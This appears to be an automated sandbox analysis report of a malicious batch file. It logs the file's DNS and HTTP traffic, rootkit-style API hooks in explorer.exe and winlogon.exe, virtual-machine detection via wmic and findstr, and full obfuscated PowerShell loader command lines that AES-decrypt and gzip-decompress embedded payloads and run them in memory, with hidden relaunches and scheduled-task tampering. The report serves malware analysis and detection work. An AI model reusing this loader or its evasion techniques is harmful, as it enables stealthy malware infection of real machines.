                                Oct 3, 2024 14:55:20.220765114 CEST1.1.1.1192.168.2.80x6d9aNo error (0)azure-winsecure.com154.216.20.132A (IP address)IN (0x0001)false
                                Oct 3, 2024 14:55:22.197309017 CEST1.1.1.1192.168.2.80x9837No error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                                • ipwho.is
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.863304195.201.57.904437080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-03 12:55:23 UTC150OUTGET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                Host: ipwho.is
                                Connection: Keep-Alive
                                2024-10-03 12:55:23 UTC223INHTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 12:55:23 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                2024-10-03 12:55:23 UTC1019INData Raw: 33 65 66 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72
                                Data Ascii: 3ef{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.33", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yor


                                Code Manipulations

                                Function NameHook TypeActive in Processes
                                ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                Function NameHook TypeNew Data
                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                Function NameHook TypeNew Data
                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:08:54:04
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1 (2).cmd" "
                                Imagebase:0x7ff6713a0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:08:54:04
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:08:54:04
                                Start date:03/10/2024
                                Path:C:\Windows\System32\wbem\WMIC.exe
                                Wow64 process (32bit):false
                                Commandline:wmic diskdrive get Model
                                Imagebase:0x7ff659df0000
                                File size:576'000 bytes
                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:4
                                Start time:08:54:04
                                Start date:03/10/2024
                                Path:C:\Windows\System32\findstr.exe
                                Wow64 process (32bit):false
                                Commandline:findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
                                Imagebase:0x7ff69db00000
                                File size:36'352 bytes
                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:5
                                Start time:08:54:04
                                Start date:03/10/2024
                                Path:C:\Windows\System32\wbem\WMIC.exe
                                Wow64 process (32bit):false
                                Commandline:wmic diskdrive get Manufacturer,Model
                                Imagebase:0x7ff659df0000
                                File size:576'000 bytes
                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:6
                                Start time:08:54:04
                                Start date:03/10/2024
                                Path:C:\Windows\System32\findstr.exe
                                Wow64 process (32bit):false
                                Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                                Imagebase:0x7ff69db00000
                                File size:36'352 bytes
                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:7
                                Start time:08:54:06
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
                                Imagebase:0x7ff6713a0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:08:54:06
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell.exe -WindowStyle Hidden
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:11
                                Start time:08:54:13
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WerFault.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392
                                Imagebase:0x7ff68ec70000
                                File size:570'736 bytes
                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:15
                                Start time:08:54:29
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                Imagebase:0x7ff6713a0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:16
                                Start time:08:54:29
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:17
                                Start time:08:54:29
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                Imagebase:0x7ff6713a0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:18
                                Start time:08:54:29
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell.exe -WindowStyle Hidden
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:19
                                Start time:08:54:30
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                Imagebase:0x7ff6713a0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:20
                                Start time:08:54:30
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:21
                                Start time:08:54:30
                                Start date:03/10/2024
                                Path:C:\Windows\System32\wbem\WMIC.exe
                                Wow64 process (32bit):false
                                Commandline:wmic diskdrive get Model
                                Imagebase:0x7ff659df0000
                                File size:576'000 bytes
                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:22
                                Start time:08:54:30
                                Start date:03/10/2024
                                Path:C:\Windows\System32\findstr.exe
                                Wow64 process (32bit):false
                                Commandline:findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
                                Imagebase:0x7ff69db00000
                                File size:36'352 bytes
                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:23
                                Start time:08:54:31
                                Start date:03/10/2024
                                Path:C:\Windows\System32\wbem\WMIC.exe
                                Wow64 process (32bit):false
                                Commandline:wmic diskdrive get Manufacturer,Model
                                Imagebase:0x7ff659df0000
                                File size:576'000 bytes
                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:24
                                Start time:08:54:31
                                Start date:03/10/2024
                                Path:C:\Windows\System32\findstr.exe
                                Wow64 process (32bit):false
                                Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                                Imagebase:0x7ff69db00000
                                File size:36'352 bytes
                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:27
                                Start time:08:54:59
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
                                Imagebase:0x7ff6713a0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:28
                                Start time:08:54:59
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell.exe -WindowStyle Hidden
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:30
                                Start time:08:55:05
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WerFault.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\WerFault.exe -u -p 7080 -s 2400
                                Imagebase:0x7ff68ec70000
                                File size:570'736 bytes
                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:32
                                Start time:08:55:10
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WerFault.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\WerFault.exe -u -p 7080 -s 2172
                                Imagebase:0x7ff68ec70000
                                File size:570'736 bytes
                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:33
                                Start time:08:55:14
                                Start date:03/10/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                Imagebase:0x7ff7036c0000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:34
                                Start time:08:55:14
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:35
                                Start time:08:55:18
                                Start date:03/10/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                Imagebase:0x510000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:36
                                Start time:08:55:18
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:37
                                Start time:08:55:18
                                Start date:03/10/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                Imagebase:0x510000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:38
                                Start time:08:55:19
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 